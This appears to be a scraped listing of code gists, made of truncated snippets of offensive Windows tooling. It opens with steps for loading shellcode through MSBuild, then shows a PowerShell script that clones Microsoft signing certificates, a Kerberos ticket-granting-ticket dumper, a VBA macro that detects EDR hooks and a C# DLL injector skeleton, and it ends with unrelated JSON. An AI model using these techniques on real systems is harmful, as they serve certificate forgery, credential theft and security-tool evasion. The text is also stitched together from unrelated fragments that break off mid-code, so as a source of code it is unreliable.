1. Open PowerShell
2. Set MSbuild GodMode Env Variable
$env:MSBUILDENABLEALLPROPERTYFUNCTIONS = 1
3. Execute C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe msbuild.png.xml
Note: This "Serves" Shellcode in a memory mapped file.
This is no accessible to other processes.
Change in line 62 in shellcode.cs . Manual offsets just to troll you. :)
I leave this for you to explore
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
syscall = 0 | |
exit = 1 | |
fork = 2 | |
read = 3 | |
write = 4 | |
open = 5 | |
close = 6 | |
wait4 = 7 | |
link = 9 | |
unlink = 10 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# We'll just store the cloned certificates in current user "Personal" store for now. | |
$CertStoreLocation = @{ CertStoreLocation = 'Cert:\CurrentUser\My' } | |
$MS_Root_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Root.cer | |
$Cloned_MS_Root_Cert = New-SelfSignedCertificate -CloneCert $MS_Root_Cert @CertStoreLocation | |
$MS_PCA_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32PCA.cer | |
$Cloned_MS_PCA_Cert = New-SelfSignedCertificate -CloneCert $MS_PCA_Cert -Signer $Cloned_MS_Root_Cert @CertStoreLocation | |
$MS_Leaf_Cert = Get-PfxCertificate -FilePath C:\Test\MSKernel32Leaf.cer |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Get-KerberosTicketGrantingTicket | |
{ | |
<# | |
.SYNOPSIS | |
Gets the Kerberos Tickets Granting Tickets from all Logon Sessions | |
.DESCRIPTION | |
Get-KerberosTicketGrantingTicket uses the Local Security Authority (LSA) functions to enumerate Kerberos logon sessions and return their associate Kerberos Ticket Granting Tickets. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Collections.Generic; | |
using System.Linq; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
namespace DllInjector | |
{ | |
public static class DllInjector | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Reflection; | |
using System.Runtime.CompilerServices; | |
using System.Text; | |
namespace ConsoleApp1 | |
{ | |
unsafe class Program | |
{ | |
static void Main(string[] args) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
static class Program | |
{ | |
[DllImport("kernel32.dll", SetLastError = true)] | |
public static extern IntPtr LoadLibrary(string dllToLoad); | |
[DllImport("kernel32.dll")] | |
public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); | |
static void Main() | |
{ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <stdio.h> | |
#define DECLARE_STRING(var, str) __attribute__((section(".text"))) char var[] = "\xe8\x00\x00\x00\x00\x58\x83\xc0\x05\xc3" str; | |
#define REF_STRING(var) ((char*(*)())var)() | |
DECLARE_STRING(data1, "Hello, World!\n"); | |
DECLARE_STRING(data2, "Goodbye, World!\n"); | |
int main(int , char** ) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
gi{"name":"Overview","desc":"System Overview","controller_version":"5.10.12","modules":[{"id":"default:mega|status","module_id":"mega|status","restrictions":{"removable":false,"draggable":false},"config":{}},{"module_id":"internet-connection","config":{},"id":"dd5f7461-f8f0-4017-859c-3d9271b673bf"},{"module_id":"summary|wifi","config":{},"id":"13a78652-ad84-4fcb-943a-86929c638353"},{"module_id":"clients|freq-distribution","config":{"palette":"BLUE_GRADIENT_10"},"id":"c9626f4f-021f-4d46-b22d-86007570bac7"},{"module_id":"clients|top5|active","config":{"trafficType":"total"},"id":"36a9e071-132e-4b4a-baee-250449a6d44f"},{"module_id":"devices|uap|top5|channel-util","config":{"trafficType":"total"},"id":"9803f077-b9cd-4db0-b466-60d92fae2020"},{"module_id":"devices|uap|top5|active","config":{"trafficType":"total"},"id":"e6133049-cc56-44b3-a4c2-b0843912dac5"},{"module_id":"devices|uap|top5|client-count","config":{},"id":"d39f9c80-1827-4ba0-b573-3209789c56b5"},{"module_id":"summary|switching","config":{},"id":"5966437 |